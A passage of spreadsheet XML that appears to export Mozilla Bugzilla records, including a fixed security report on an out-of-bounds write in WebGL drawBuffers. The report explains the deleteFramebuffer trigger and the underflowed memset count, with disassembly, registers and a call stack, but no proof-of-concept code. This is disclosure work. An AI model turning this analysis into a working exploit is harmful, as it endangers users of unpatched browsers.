      </c>
      <c r="L3683" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3683" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3683" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3683" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3683" t="inlineStr"/>
      <c r="Q3683" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3683" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3683" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T3683" t="n">
        <v>1</v>
      </c>
      <c r="U3683" t="n">
        <v>0</v>
      </c>
      <c r="V3683" t="n">
        <v>5</v>
      </c>
      <c r="W3683" t="inlineStr">
        <is>
          <t>see bug 1415230.</t>
        </is>
      </c>
      <c r="X3683" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3684">
      <c r="A3684" t="n">
        <v>1699077</v>
      </c>
      <c r="B3684" t="inlineStr">
        <is>
          <t>2021-03-17 04:19:30 -0700</t>
        </is>
      </c>
      <c r="C3684" t="inlineStr">
        <is>
          <t>webgl OOBW in drawbuffers</t>
        </is>
      </c>
      <c r="D3684" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:00 -0700</t>
        </is>
      </c>
      <c r="E3684" t="n">
        <v>1</v>
      </c>
      <c r="F3684" t="n">
        <v>1</v>
      </c>
      <c r="G3684" t="n">
        <v>3</v>
      </c>
      <c r="H3684" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3684" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3684" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3684" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3684" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3684" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3684" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3684" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3684" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main88+][adv-esr78.10+][sec-survey]</t>
        </is>
      </c>
      <c r="Q3684" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3684" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3684" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T3684" t="n">
        <v>1</v>
      </c>
      <c r="U3684" t="n">
        <v>0</v>
      </c>
      <c r="V3684" t="n">
        <v>20</v>
      </c>
      <c r="W3684" t="inlineStr">
        <is>
          <t>Created attachment 9209694
drawbuffers-fill-memset-poc.html
##Crash Environment:
**Firefox Nightly :	88.0a1 (2021-03-16) (64-bit)**
##Crash Analysis:
Crash occurs in ***VCRUNTIME140!memset+0xd0*** at the following instruction:
&gt; movntps xmmword ptr [rcx],xmm0
Further analyzing the crash from PoC we can confirm that the crash occurs while executing ***drawBuffers()*** function after calling ***deleteFramebuffer()*** function. 
When debugging the PoC, at the start of ***libGLESv2!gl::Framebuffer::setDrawBuffers*** function the values for ***mDrawBufferStates*** and ***mReadBufferState*** is **0x405**. Whereas when we remove ***deleteFramebuffer*** call from the PoC the states value is **0x8ce0** for both ***mDrawBufferStates*** and ***mReadBufferState***.
From the debugger we can see that the value at ***gl context + 120h*** stores the pointer for the start of ***mDrawBuffer*** and ***context + 128h*** contains the end pointer of ***mDrawBuffer***. In case of PoC the difference between the start and end is **4 bytes** whereas the difference when not using ***deleteFramebuffer*** in PoC is **32 bytes**.
Thus, when executing the function ***std::fill*** we see the following assembly instructions:
&gt;       18004c18f 48 8b 87 20 01 00 00           MOV        RAX,qword ptr [RDI + 0x120]
&gt;       18004c196 48 8b 97 28 01 00 00           MOV        RDX,qword ptr [RDI + 0x128]
&gt;       18004c19d 4a 8d 0c b8                    LEA        RCX,[RAX + R15*0x4]
&gt;       18004c1a1 48 39 d1                       CMP        RCX,RDX
&gt;       18004c1a4 74 1c                          JZ         libGLESv2!gl::Framebuffer::setDrawBuffers+0x72
&gt;       18004c1a6 4c 89 fd                       MOV        RBP,R15
&gt;       18004c1a9 48 f7 d5                       NOT        RBP
&gt;       18004c1ac 4c 8d 04 aa                    LEA        R8,[param_1 + RBP*0x4]
&gt;       18004c1b0 49 29 c0                       SUB        R8,RAX
&gt;       18004c1b3 49 83 c0 04                    ADD        R8,0x4
&gt;       18004c1b7 49 83 e0 fc                    AND        R8,-0x4
&gt;       18004c1bb 31 d2                          XOR        EDX,EDX
&gt;       18004c1bd e8 1e 13                       CALL       libGLESV2!memset                                           
In the second instruction ***rdx*** is loaded with end pointer for the ***mDrawBufferStates*** and in third instruction ***rcx*** is loaded with start pointer for ***mDrawBufferStates + 8 * 4***. Now ***rcx*** points to start of ***mDrawBufferStates +20h*** whereas ***rdx*** points to end of ***mDrwaBufferStates*** which is **start + 04h**. After the ***cmp*** instruction program does not jump and continues till ***memset*** call. Just before ***memset*** call we calculate ***r8*** to contain ***0xffffffffffffe4***, this huge unsigned value is passed as the ***count*** parameter to ***memset*** and thus leads to **Out of Bounds Write**.
##Registry Values at Crash:
```
2:042&gt; r
rax=0000025dc3b35b50 rbx=0000025dc3b56000 rcx=0000025dc3bff000
rdx=0000000000000000 rsi=0000025dc3b56000 rdi=0000025dc3b8c400
rip=00007ffe1f5017d0 rsp=000000b1ee10ea78 rbp=fffffffffffffff7
 r8=ffffffffffffffd4  r9=01ffffffffffe6d6 r10=0000025dc21fbe20
r11=0000025dc3b35b70 r12=0000025dc3b485a0 r13=0000000000000000
r14=0000000000000000 r15=0000000000000008
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
VCRUNTIME140!memset+0xd0:
00007ffe`1f5017d0 0f2b01          movntps xmmword ptr [rcx],xmm0 ds:0000025d`c3bff000=????????????????????????????????
```
##Call Stack:
```
2:042&gt; k
 # Child-SP          RetAddr               Call Site
00 000000b1`ee10ea78 00007ffd`e452c1c2     VCRUNTIME140!memset+0xd0 [d:\agent\_work\2\s\src\vctools\crt\vcruntime\src\string\amd64\memset.asm @ 196] 
01 (Inline Function) --------`--------     libGLESv2!std::_Fill_unchecked1+0x21 [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/xutility @ 2903] 
02 (Inline Function) --------`--------     libGLESv2!std::_Fill_unchecked+0x21 [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/xutility @ 2917] 
03 (Inline Function) --------`--------     libGLESv2!std::fill+0x21 [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/xutility @ 2925] 
04 000000b1`ee10ea80 00007ffd`e4504d17     libGLESv2!gl::Framebuffer::setDrawBuffers+0x72 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Framebuffer.cpp @ 946] 
05 000000b1`ee10eb00 00007ffd`e4700f81     libGLESv2!gl::Context::drawBuffers+0x17 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Context.cpp @ 4378] 
06 000000b1`ee10eb30 00007ffd`d788f9b1     libGLESv2!gl::DrawBuffers+0x81 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libGLESv2/entry_points_gles_3_0_autogen.cpp @ 685] 
07 000000b1`ee10eb80 00007ffd`d788fae1     xul!mozilla::gl::GLContext::fDrawBuffers+0x31 [/builds/worker/checkouts/gecko/gfx/gl/GLContext.h @ 2437] 
08 000000b1`ee10ebc0 00007ffd`d788fce8     xul!mozilla::WebGLFramebuffer::RefreshDrawBuffers+0x101 [/builds/worker/checkouts/gecko/dom/canvas/WebGLFramebuffer.cpp @ 1075] 
09 000000b1`ee10ec30 00007ffd`d787d9bb     xul!mozilla::WebGLFramebuffer::DrawBuffers+0x138 [/builds/worker/checkouts/gecko/dom/canvas/WebGLFramebuffer.cpp @ 1144] 
0a 000000b1`ee10ecd0 00007ffd`d7895154     xul!mozilla::WebGLContext::DrawBuffers+0x6b [/builds/worker/checkouts/gecko/dom/canvas/WebGLContextFramebufferOperations.cpp @ 148] 
0b (Inline Function) --------`--------     xul!mozilla::HostWebGLContext::DrawBuffers+0x11 [/builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h @ 729] 
0c (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,98,void (mozilla::HostWebGLContext::*)(const std::vector&lt;unsigned int,std::allocator&lt;unsigned int&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::DrawBuffers&gt;::DispatchCommand&lt;mozilla::HostWebGLContext&gt;::&lt;unnamed-tag&gt;::operator()+0x1a [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 231] 
0d (Inline Function) --------`--------     xul!std::_C__Invoker_functor::_Call+0x1a [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/type_traits @ 16707566] 
0e (Inline Function) --------`--------     xul!std::_C_invoke+0x1a [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/type_traits @ 16707566] 
0f (Inline Function) --------`--------     xul!std::_Apply_impl+0x1a [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/tuple @ 1233] 
10 (Inline Function) --------`--------     xul!std::apply+0x1a [/builds/worker/checkouts/gecko/vs2017_15.8.4/VC/include/tuple @ 1241] 
11 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,98,void (mozilla::HostWebGLContext::*)(const std::vector&lt;unsigned int,std::allocator&lt;unsigned int&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::DrawBuffers&gt;::DispatchCommand+0x2105 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 228] 
12 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,97,void (mozilla::HostWebGLContext::*)(unsigned long long, const std::vector&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::allocator&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &amp;, unsigned int) const,&amp;mozilla::HostWebGLContext::TransformFeedbackVaryings&gt;::DispatchCommand+0x2105 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
13 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,96,void (mozilla::HostWebGLContext::*)() const,&amp;mozilla::HostWebGLContext::ResumeTransformFeedback&gt;::DispatchCommand+0x2112 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
14 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,95,void (mozilla::HostWebGLContext::*)() const,&amp;mozilla::HostWebGLContext::PauseTransformFeedback&gt;::DispatchCommand+0x2112 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
15 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,94,void (mozilla::HostWebGLContext::*)() const,&amp;mozilla::HostWebGLContext::EndTransformFeedback&gt;::DispatchCommand+0x2112 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
16 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,93,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::BeginTransformFeedback&gt;::DispatchCommand+0x2157 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
17 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,92,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&amp;mozilla::HostWebGLContext::BindTransformFeedback&gt;::DispatchCommand+0x2157 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
18 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,91,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, float) const,&amp;mozilla::HostWebGLContext::SamplerParameterf&gt;::DispatchCommand+0x2157 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
19 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,90,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, int) const,&amp;mozilla::HostWebGLContext::SamplerParameteri&gt;::DispatchCommand+0x2222 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1a (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,89,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindSampler&gt;::DispatchCommand+0x2222 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1b (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,88,void (mozilla::HostWebGLContext::*)(const mozilla::webgl::ReadPixelsDesc &amp;, unsigned long long) const,&amp;mozilla::HostWebGLContext::ReadPixelsPbo&gt;::DispatchCommand+0x2222 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1c (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,87,void (mozilla::HostWebGLContext::*)(unsigned int, int, float, int) const,&amp;mozilla::HostWebGLContext::ClearBufferfi&gt;::DispatchCommand+0x2222 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1d (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,86,void (mozilla::HostWebGLContext::*)(unsigned int, int, const mozilla::webgl::TypedQuad &amp;) const,&amp;mozilla::HostWebGLContext::ClearBufferTv&gt;::DispatchCommand+0x2338 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1e (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,85,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::webgl::VertAttribPointerDesc &amp;) const,&amp;mozilla::HostWebGLContext::VertexAttribPointer&gt;::DispatchCommand+0x2338 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
1f (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,84,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::DisableVertexAttribArray&gt;::DispatchCommand+0x2338 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
20 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,83,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::EnableVertexAttribArray&gt;::DispatchCommand+0x2338 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
21 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,82,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::UniformBlockBinding&gt;::DispatchCommand+0x2338 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
22 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,81,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::VertexAttribDivisor&gt;::DispatchCommand+0x2338 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
23 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,80,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::webgl::TypedQuad &amp;) const,&amp;mozilla::HostWebGLContext::VertexAttrib4T&gt;::DispatchCommand+0x2400 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
24 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,79,void (mozilla::HostWebGLContext::*)(unsigned int, bool, const mozilla::RawBuffer&lt;unsigned char&gt; &amp;) const,&amp;mozilla::HostWebGLContext::UniformData&gt;::DispatchCommand+0x2400 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
25 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,78,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&amp;mozilla::HostWebGLContext::UseProgram&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
26 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,77,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, const mozilla::FloatOrInt &amp;) const,&amp;mozilla::HostWebGLContext::TexParameter_base&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
27 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,76,void (mozilla::HostWebGLContext::*)(bool, unsigned int, unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::RawBuffer&lt;unsigned char&gt; &amp;, unsigned int, const mozilla::Maybe&lt;unsigned long long&gt; &amp;) const,&amp;mozilla::HostWebGLContext::CompressedTexImage&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
28 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,75,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::webgl::PackingInfo &amp;, const mozilla::webgl::TexUnpackBlobDesc &amp;) const,&amp;mozilla::HostWebGLContext::TexImage&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
29 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,74,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;) const,&amp;mozilla::HostWebGLContext::TexStorage&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2a (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,73,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, const mozilla::avec3&lt;unsigned int&gt; &amp;, const mozilla::avec2&lt;int&gt; &amp;, const mozilla::avec2&lt;unsigned int&gt; &amp;) const,&amp;mozilla::HostWebGLContext::CopyTexImage&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2b (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,72,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::GenerateMipmap&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2c (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,71,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindTexture&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2d (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,70,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::ActiveTexture&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2e (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,69,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned int, unsigned int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::RenderbufferStorageMultisample&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
2f (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,68,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::ReadBuffer&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
30 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,67,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer&lt;const unsigned int&gt; &amp;, int, int, int, int) const,&amp;mozilla::HostWebGLContext::InvalidateSubFramebuffer&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
31 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,66,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer&lt;const unsigned int&gt; &amp;) const,&amp;mozilla::HostWebGLContext::InvalidateFramebuffer&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
32 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,65,void (mozilla::HostWebGLContext::*)(int, int, int, int, int, int, int, int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlitFramebuffer&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
33 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,64,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long, const mozilla::RawBuffer&lt;unsigned char&gt; &amp;) const,&amp;mozilla::HostWebGLContext::BufferSubData&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
34 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,63,void (mozilla::HostWebGLContext::*)(unsigned int, const mozilla::RawBuffer&lt;unsigned char&gt; &amp;, unsigned int) const,&amp;mozilla::HostWebGLContext::BufferData&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
35 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,62,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned long long, unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::CopyBufferSubData&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
36 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,61,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned long long, unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindBufferRange&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
37 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,60,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned long long) const,&amp;mozilla::HostWebGLContext::BindBuffer&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
38 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,59,void (mozilla::HostWebGLContext::*)(int, int, int, int) const,&amp;mozilla::HostWebGLContext::Viewport&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
39 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,58,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::StencilOpSeparate&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3a (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,57,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::StencilMaskSeparate&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3b (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,56,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, int, unsigned int) const,&amp;mozilla::HostWebGLContext::StencilFuncSeparate&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3c (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,55,void (mozilla::HostWebGLContext::*)(unsigned long long, const std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &amp;) const,&amp;mozilla::HostWebGLContext::ShaderSource&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3d (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,54,void (mozilla::HostWebGLContext::*)(int, int, int, int) const,&amp;mozilla::HostWebGLContext::Scissor&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3e (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,53,void (mozilla::HostWebGLContext::*)(float, bool) const,&amp;mozilla::HostWebGLContext::SampleCoverage&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
3f (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,52,void (mozilla::HostWebGLContext::*)(unsigned long long, mozilla::layers::TextureType, bool) const,&amp;mozilla::HostWebGLContext::Present&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
40 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,51,void (mozilla::HostWebGLContext::*)(float, float) const,&amp;mozilla::HostWebGLContext::PolygonOffset&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
41 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,50,void (mozilla::HostWebGLContext::*)(unsigned long long) const,&amp;mozilla::HostWebGLContext::LinkProgram&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
42 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,49,void (mozilla::HostWebGLContext::*)(float) const,&amp;mozilla::HostWebGLContext::LineWidth&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
43 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,48,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::Hint&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
44 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,47,void (mozilla::HostWebGLContext::*)(unsigned int) const,&amp;mozilla::HostWebGLContext::FrontFace&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
45 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,46,void (mozilla::HostWebGLContext::*)(unsigned int, unsigned int, unsigned int, unsigned long long, int, int, int) const,&amp;mozilla::HostWebGLContext::FramebufferAttach&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
46 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,45,void (mozilla::HostWebGLContext::*)() const,&amp;mozilla::HostWebGLContext::Flush&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
47 (Inline Function) --------`--------     xul!mozilla::MethodDispatcher&lt;WebGLMethodDispatcher,44,void (mozilla::HostWebGLContext::*)(unsigned long long, unsigned long long) const,&amp;mozilla::HostWebGLContext::DetachShader&gt;::DispatchCommand+0x2463 [/builds/worker/checkouts/gecko/dom/canvas/WebGLCommandQueue.h @ 236] 
